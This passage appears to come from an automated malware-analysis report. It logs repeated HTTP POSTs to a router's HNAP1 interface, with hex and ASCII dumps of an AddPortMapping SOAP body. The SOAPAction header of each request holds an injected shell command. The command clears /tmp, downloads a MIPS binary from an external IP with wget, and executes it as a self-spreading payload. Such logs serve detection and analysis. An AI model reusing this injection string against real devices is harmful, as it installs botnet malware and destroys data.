38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 